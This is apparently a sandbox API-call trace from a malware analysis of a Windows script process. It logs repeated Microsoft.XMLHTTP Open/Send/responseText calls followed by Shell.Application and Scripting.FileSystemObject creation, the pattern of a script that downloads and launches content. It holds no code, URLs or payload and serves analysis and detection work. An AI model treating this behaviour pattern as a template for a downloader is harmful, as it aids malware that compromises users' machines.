	[0515.470] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0515.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0515.470] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0515.470] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0515.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0515.470] ??2@YAPEAX_K@Z () returned 0x62f310
	[0515.470] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0515.470] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0515.470] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0515.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0515.470] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0515.470] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0515.470] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0515.471] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0515.471] longjmp () 
	[0515.471] longjmp () 
	[0515.471] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0515.471] SysStringLen (param_1=0x0) returned 0x0
	[0515.471] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0515.471] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0515.471] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0515.471] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0515.471] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0515.471] ??2@YAPEAX_K@Z () returned 0x62f330
	[0515.471] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f330) 
	[0515.471] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0515.472] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0515.472] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0515.472] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0515.472] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0515.472] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0515.472] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0515.472] longjmp () 
	[0515.472] longjmp () 
	[0515.472] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0515.473] SysStringLen (param_1=0x0) returned 0x0
	[0515.473] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0515.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0515.473] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0515.473] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0515.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0515.473] ??2@YAPEAX_K@Z () returned 0x62f310
	[0515.473] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0515.473] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0515.473] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0515.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0515.473] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0515.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0515.474] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0515.475] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0515.475] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0515.476] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0515.476] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0518.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0518.721] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0518.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0518.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0518.721] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0518.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0518.722] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0518.722] SysStringLen (param_1=0x0) returned 0x0
	[0518.722] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0518.722] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0518.722] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64efa30) returned 0x0
	[0518.722] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0518.722] Shell:IUnknown:QueryInterface (in: This=0x64efa30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64efa70) returned 0x0
	[0518.722] ??2@YAPEAX_K@Z () returned 0x62f350
	[0518.722] Shell:IObjectWithSite:SetSite (This=0x64efa70, pUnkSite=0x62f350) returned 0x0
	[0518.722] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0518.722] Shell:IUnknown:Release (This=0x64efa70) returned 0x1
	[0518.722] Shell:IUnknown:QueryInterface (in: This=0x64efa30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64efa30) returned 0x0
	[0518.722] Shell:IUnknown:AddRef (This=0x64efa30) returned 0x3
	[0518.722] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0518.722] SysStringLen (param_1=0x0) returned 0x0
	[0518.722] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0518.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0518.726] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0518.726] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0518.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0518.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0518.726] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0520.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0520.432] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0520.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0520.433] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0520.433] SysStringLen (param_1=0x0) returned 0x0
	[0520.433] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0520.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0520.434] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0520.434] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0520.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0520.434] ??2@YAPEAX_K@Z () returned 0x62f310
	[0520.434] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0520.434] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0520.434] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0520.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0520.434] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0520.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0520.434] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0520.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
